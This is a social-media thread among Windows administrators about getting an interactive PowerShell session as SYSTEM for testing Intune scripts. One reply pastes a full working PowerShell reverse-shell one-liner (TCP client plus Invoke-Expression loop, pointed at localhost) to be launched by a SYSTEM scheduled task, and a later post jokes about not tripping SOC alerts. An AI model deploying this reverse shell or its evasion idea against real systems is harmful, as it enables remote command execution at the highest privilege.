Why is it so hard to get an interactive #PowerShell console as NT Authority#SYSTEM?!

@sassdawe I know psexec -s is a default answer, but I guess your whole point was using native Powershell.

Looks like a job for a revshell!

First I found a listener here:

https://gist.github.com/staaldraad/8473da7f2dfed28b2216b15ca6ebad11

Run that in one window.

Then saved this revshell as a file:

$LHOST = "127.0.0.1"; $LPORT = 413; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()

Create a Scheduled Task that runs as SYSTEM and runs it.

@sassdawe Because there is no need to run anything as SYSTEM if you as administrator of the OS do your job properly. Otherwise you can always rely on Sysinternals tools.

@Brokar I agree, I don't like that I need to use SYSTEM. But #Intune remediation tasks run as SYSTEM when you need admin rights, and as part of the developer workflow you kind of need to test with SYSTEM to make sure your script will also execute properly when distributed by Intune.

@jsmall you know that I am not going to run this, do you? 😁

I ended up using the Invoke-CommandAs module, because that is an -AsSytem parameter which does exactly that, it creates a Scheduled Task as SYSTEM, and I can use Enter-PSHostProcess to jump into that scheduled task and run my code.

My frustration comes from that Admin to System is not a security boundary when it comes to Bug Bounties, than why this is so hard to do?

@sassdawe but that wouldn't require an interactive shell. That just would require a scheduled task running as SYSTEM. And that's an easy one to create.

@Brokar Ideally, yes.

But I am stuck with LAPS, so I need to first from my normal account to the LAPS admin account, and from there to SYSTEM. Without actually trying to type that stupid admin password into the UAC prompt.

@sassdawe Also keep in mind that SYSTEM has no own profile, so many things you'd expect in a user environment doesn't exist there. That would make using an interactive shell more prone to produce errors than running the script in a scheduled task, which would simulate the same environment Intune finds when it runs.

@Brokar true, this is why I use Enter-PSHostProcess
https://infosec.exchange/@sassdawe/113095372901377083

@sassdawe I mean I know, but it was fun to put together.

@jsmall haha

I also need to not trigger any alerts at the SOC.

@jsmall That said, I am surprised that someone impersonating the SYSTEM has not triggered anything. 🤔

@sassdawe I wonder if it logs something I could hunt for.

@buherator shush